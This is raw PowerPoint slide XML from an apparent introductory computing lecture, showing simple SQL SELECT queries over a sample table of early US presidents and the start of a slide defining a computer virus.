              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>presidents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>presidents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jefferson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41C512F-7719-42E5-A872-EED32D6D9147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2948350207"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1313487" y="3423377"/>
          <a:ext cx="9589088" cy="2225040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{D7AC3CCA-C797-4891-BE02-D94E43425B78}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1136301">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3552698260"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1481360">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1168334998"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1556201">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="164526466"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2218864">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="95918760"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1457510397"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3623328670"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>num</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>firstname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>lastname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>hometown</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>birthday</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>hiredate</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2394002928"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>George</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Washington</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Popes Creek, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FEB-22-1732</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-30-1789</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1677156271"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>John</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Adams</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Braintree, MA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>OCT-30-1735</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1797</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3244139392"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Thomas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Jefferson</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Shadwell, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-13-1743</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1801</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3743850534"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>James</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Madison</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Port Conway, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-16-1751</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1809</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1713610808"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>James</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Monroe</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Monroe Hall, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-28-1758</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1817</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2522575697"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99125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3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Type of malware that requires human intervention to propagate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
